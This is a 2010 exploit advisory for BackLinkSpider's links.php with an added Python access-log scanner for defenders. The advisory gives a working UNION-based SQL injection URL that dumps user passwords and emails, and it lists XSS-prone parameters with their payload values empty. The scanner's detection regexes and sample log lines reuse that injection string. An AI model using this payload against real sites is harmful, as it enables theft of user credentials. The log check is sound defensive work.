BackLinkSpider version 1.3.1774.0 suffers from cross-site scripting and remote SQL injection vulnerabilities.
de0472686ec59875781071d4abbba198b8300512ce9f3eb27eb4e6ac59a41fea
# Exploit Title: [ BackLinkSpider - (links.php) - [ SQL & XSS ] Injection Vulnerability ]
# Date: [ 2010-05-27 ]
# Author: [ sniper ip ]
# Software Link: [ http://www.backlinkspider.com ]
# Version: [ v 1.3.1774.0 ]
# Tested on: [ ]
# CVE : [if exists]
Exploit :
[ SQL ]
http://site.com/links.php?cat_id=-1+UNION+SELECT+1,2,3,4,5,6,concat(password,0x3a,email),8,9,10,11,12,13,14,15,16,17,18,19,20+from+lp_user_tb--
----------------------------------------------
[ XSS ]
http://site.com/links.php?cat_id=
http://site.com/links.php?siteid=
http://site.com/links.php?cat_id=1&cat_name=1
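
For defenders, a log check for requests to links.php that carry unexpected values in the parameters listed above. This is an added example, not part of the original advisory or of BackLinkSpider. It assumes common/combined access-log format, that cat_id and siteid are plain integers in normal use, and that cat_name never legitimately contains markup; the function names and the sample log lines are constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

NUMERIC_PARAMS = ("cat_id", "siteid")  # assumption: integer ids in normal use
TEXT_PARAMS = ("cat_name",)            # assumption: free text, never markup
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQL_RE = re.compile(r"\bunion\b.*\bselect\b|--|/\*|\bconcat\s*\(", re.I | re.S)
MARKUP_RE = re.compile(r"[<>\"']")

# Constructed sample lines (documentation IP range); line 2 reuses the advisory's URL.
SAMPLE_LOG = [
    '192.0.2.10 - - [27/May/2010:10:00:00 +0000] "GET /links.php?cat_id=7 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [27/May/2010:10:00:05 +0000] "GET /links.php?cat_id=-1+UNION+SELECT+1,2,3,4,5,6,concat(password,0x3a,email),8,9,10,11,12,13,14,15,16,17,18,19,20+from+lp_user_tb-- HTTP/1.1" 200 5300',
    '192.0.2.12 - - [27/May/2010:10:00:09 +0000] "GET /links.php?cat_id=1&cat_name=%3Cb%3Etest%3C%2Fb%3E HTTP/1.1" 200 5150',
    '192.0.2.13 - - [27/May/2010:10:00:12 +0000] "GET /links.php?siteid=abc HTTP/1.1" 200 4000',
]


def classify(log_line):
    """Return a list of (parameter, reason) findings for one access-log line."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/links.php"):
        return []
    # parse_qs percent-decodes values and turns '+' into a space.
    params = parse_qs(url.query, keep_blank_values=True)
    findings = []
    for name in NUMERIC_PARAMS:
        for value in params.get(name, []):
            if SQL_RE.search(value):
                findings.append((name, "sql-keywords"))
            elif MARKUP_RE.search(value):
                findings.append((name, "markup"))
            elif not re.fullmatch(r"\d{1,10}", value):
                findings.append((name, "non-numeric"))
    for name in TEXT_PARAMS:
        for value in params.get(name, []):
            if MARKUP_RE.search(value):
                findings.append((name, "markup"))
    return findings


def scan(lines):
    """Map 1-based line number to findings, leaving out clean lines."""
    results = ((n, classify(line)) for n, line in enumerate(lines, 1))
    return {n: found for n, found in results if found}
```

Calling scan(SAMPLE_LOG) flags lines 2, 3 and 4 and leaves the ordinary cat_id=7 request alone.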